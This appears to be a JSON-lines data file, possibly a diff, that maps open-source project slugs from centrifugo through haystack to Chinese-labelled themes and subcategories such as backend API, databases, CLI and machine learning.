-{"slug":"centrifugo","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"cert-manager","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"cesium","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"chainlink-ccip","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"chainlink","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"chalk","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"changesets","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"chaos-mesh","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"chart-js","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"chartist","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"chatwoot","area":"projects","theme":"通信","themeId":"communication","subcategory":"客服平台","source":"category","confidence":"high","rawCategory":"通信"} -{"slug":"chi","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"chroma","area":"projects","theme":"数据库","themeId":"databases","subcategory":"数据库 / 向量","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"cilium","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"circuitpython","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"clack","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / Web 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"claude-agent-sdk","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 工程","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"claude-code","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"智能体与 LLM","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"clearml","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"clerk","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"框架与 SDK","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"clickhouse","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"cockroach","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"cockroachdb","area":"projects","theme":"分布式系统","themeId":"distributed-systems","subcategory":"数据库 / 分布式","source":"category","confidence":"high","rawCategory":"分布式系统"} -{"slug":"cocos2d-x","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"codemirror","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"collabora-online","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"colmap","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"colossal-ai","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"comfyui","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"commander","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"compound-v3","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"conduit","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"conform","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"connect-rpc","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"containerd","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"continue","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI 编码工具","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"conversations","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"coqui-tts","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"cordova","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"cosmos-sdk","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"cosmwasm","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"coturn","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"couchdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"crewai","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"cri-o","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"ctranslate2","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"curlie","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"curve","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"cvat","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"cytoscape-js","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"d3","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"projects / 数据可视化","source":"category","confidence":"high","rawCategory":"数据可视化"} -{"slug":"dagger","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"dagster","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"dasel","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"dash.js","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"dash","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"dask","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"databend","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"datadog","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"可观测性 / DevOps","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"date-fns","area":"projects","theme":"CLI","themeId":"cli","subcategory":"projects / 工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"dav1d","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"dayjs","area":"projects","theme":"CLI","themeId":"cli","subcategory":"工具库","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"dbt-core","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"debezium","area":"projects","theme":"数据库","themeId":"databases","subcategory":"数据基建 / CDC","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"decord","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"视频理解","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"deepspeed","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"defold","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"delta","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"dendrite","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"deno","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"语言运行时","source":"candidates.topic","confidence":"high","rawCategory":"编译器"} -{"slug":"dgraph","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"dhtmlx-gantt","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"dify","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"AI","source":"category","confidence":"high","rawCategory":"机器学习"} -{"slug":"discord-js","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"discord-py","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"dive","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"django","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"dlib","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"dnd-kit","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects / 前端","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"docker-compose","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"docker","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"docusaurus","area":"projects","theme":"CLI","themeId":"cli","subcategory":"文档工具","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"doom-emacs","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"doris","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"dovecot","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"dragonfly","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"drawio","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"drizzle","area":"projects","theme":"数据库","themeId":"databases","subcategory":"ORM","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"drone","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"dropwizard","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"druid","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"dspy","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"dua-cli","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"duckdb-wasm","area":"projects","theme":"数据库","themeId":"databases","subcategory":"数据库","source":"category","confidence":"high","rawCategory":"数据库"} -{"slug":"duckdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"duf","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"dust","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"dvc","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"earthly","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"echarts","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"projects / 数据可视化","source":"category","confidence":"high","rawCategory":"数据可视化"} -{"slug":"echo","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"edgedb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"effect","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"TypeScript 运行时","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"ejabberd","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"elasticsearch","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"electron-builder","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"electron-forge","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"electron","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"element-android","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"element-web","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"elysia","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"web 框架","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"emacs","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"embassy","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"embedded-hal","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"emotion","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"emqx","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"encore","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"enquirer","area":"projects","theme":"CLI","themeId":"cli","subcategory":"projects / 命令行","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"envoy","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"erigon","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"errbot","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"esbuild","area":"projects","theme":"编译器","themeId":"compilers","subcategory":"构建工具","source":"category","confidence":"high","rawCategory":"编译器"} -{"slug":"essentia","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"etcd","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"ethers-js","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"evidence","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"excalidraw","area":"projects","theme":"通信","themeId":"communication","subcategory":"协作工具","source":"category","confidence":"high","rawCategory":"通信"} -{"slug":"expo","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"express","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"eza","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"fabric-js","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"前端 / Canvas","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"faiss","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"fastai","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"fastapi","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"faster-whisper","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"fastify","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"web-frameworks","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"fd","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"fdk-aac","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"feast","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"ferretdb","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"ffmpeg","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"fiber","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"filament","area":"projects","theme":"图形学","themeId":"graphics","subcategory":"渲染与图形","source":"candidates.topic","confidence":"high","rawCategory":"图形学"} -{"slug":"filecoin","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"fish-shell","area":"projects","theme":"CLI","themeId":"cli","subcategory":"Shell","source":"category","confidence":"high","rawCategory":"CLI"} -{"slug":"fish","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"flac","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"flask","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"flax","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"flowchart-js","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"fluent-bit","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"flutter-rust-bridge","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"flutter","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"移动端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"flux","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"fooocus","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 AI","source":"candidates.topic","confidence":"high","rawCategory":"机器学习"} -{"slug":"foundry","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"framer-motion","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"动画","source":"category","confidence":"high","rawCategory":"数据可视化"} -{"slug":"frappe-gantt","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"freemodbus","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"freertos","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"freeswitch","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"fx","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"fzf","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"gdu","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"geany","area":"projects","theme":"CLI","themeId":"cli","subcategory":"编辑器与 IDE","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"gh","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"gin","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"github-actions","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps / CI-CD","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"gitui","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"glab","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"glances","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"glide-data-grid","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"go-ethereum","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"go-zero","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"got","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"projects","source":"category","confidence":"high","rawCategory":"后端 API"} -{"slug":"gqlgen","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"gradio","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"grafana-tempo","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"基础设施","source":"category","confidence":"high","rawCategory":"基础设施"} -{"slug":"grafana","area":"projects","theme":"基础设施","themeId":"infrastructure","subcategory":"DevOps 与运维","source":"candidates.topic","confidence":"high","rawCategory":"基础设施"} -{"slug":"grape","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"graphology","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"graphql-yoga","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"greenplum-db","area":"projects","theme":"数据库","themeId":"databases","subcategory":"存储与查询","source":"candidates.topic","confidence":"high","rawCategory":"数据库"} -{"slug":"gron","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"grpc-go","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"gsap","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"动画","source":"category","confidence":"high","rawCategory":"数据可视化"} -{"slug":"gstreamer","area":"projects","theme":"操作系统","themeId":"operating-systems","subcategory":"嵌入式","source":"candidates.topic","confidence":"high","rawCategory":"操作系统"} -{"slug":"gum","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"hadolint","area":"projects","theme":"CLI","themeId":"cli","subcategory":"命令行工具","source":"candidates.topic","confidence":"high","rawCategory":"CLI"} -{"slug":"hanami","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"handbrake","area":"projects","theme":"通信","themeId":"communication","subcategory":"音视频媒体","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"handsontable","area":"projects","theme":"数据可视化","themeId":"dataviz","subcategory":"数据可视化","source":"candidates.topic","confidence":"high","rawCategory":"数据可视化"} -{"slug":"haproxy","area":"projects","theme":"后端 API","themeId":"backend-api","subcategory":"Web 后端","source":"candidates.topic","confidence":"high","rawCategory":"后端 API"} -{"slug":"haraka","area":"projects","theme":"通信","themeId":"communication","subcategory":"实时通信","source":"candidates.topic","confidence":"high","rawCategory":"通信"} -{"slug":"hardhat","area":"projects","theme":"区块链","themeId":"blockchain","subcategory":"链与合约","source":"candidates.topic","confidence":"high","rawCategory":"区块链"} -{"slug":"haystack","area":"projects","theme":"机器学习","themeId":"machine-learning","subcategory":"数据科学与 